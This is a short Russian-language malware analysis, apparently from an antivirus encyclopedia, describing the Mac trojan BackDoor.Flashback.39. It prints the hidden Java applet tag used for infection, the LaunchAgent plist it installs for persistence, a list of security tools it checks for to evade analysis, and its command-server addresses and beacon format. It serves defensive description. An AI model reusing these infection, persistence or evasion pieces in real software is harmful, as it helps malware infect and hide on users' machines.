Троянская программа для MacOS X. Заражение осуществляется с использованием уязвимостей Java. Параметры для установки в систему передаются через параметры апплета, например:
<object type="application/x-java-applet" width="0" height="0"> <param name="s" value="1"/> <param name="q" value="2"/> <param name="svname" value="com.zeobit.keep"> <param name="svbname" value="mkeeper"> <param name="dname" value="Software Update"> <param name="lurl" value="31.31.79.87">'); <param name="archive" value="al-2.jar"> <param name="code" value="a.apl"> </object>
Эксплойт сохраняет на жесткий диск исполняемый файл и plist-файл отвечайющий за его запуск.
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.zeobit.keep</string> <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array> <key>RunAtLoad</key><true/> <key>StartInterval</key><integer>4212</integer> <key>StandardErrorPath</key><string>/dev/null</string> <key>StandardOutPath</key><string>/dev/null</string> </dict> </plist>
После запуска троян осуществляет проверку на наличие компонент и при наличии хотябы одной из них прекращает свое выполнение:
* /Library/Little Snitch * /Developer/Applications/Xcode.app/Contents/MacOS/Xcode * /Applications/VirusBarrier X6.app * /Applications/iAntiVirus/iAntiVirus.app * /Applications/avast!.app * /Applications/ClamXav.app * /Applications/HTTPScoop.app * /Applications/Packet Peeper.app
Далее отсылает сообщение об успешной установке на сервер статистики:
http://46.17.63.144/stat_svc/
Формирует список командных центров и начинает последовательный опрос соответсвующих серверов, используя GET запросы с указанием в поле user-agent следующей строки:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:%s; id:%s) Gecko/20100101 Firefox/9.0.1
где sv: - версия бота, id: - уникальный идентификатор машины (Hardware UUID).
Получив ответ от управляющего сервера, BackDoor.Flashback.39 проверяет наличие в нем трех тегов:
##begin## ##sign## ##end##
Если проверка сообщения по подписи RSA оказывается успешной, загружает и запускает на инфицированной машине полезную нагрузку.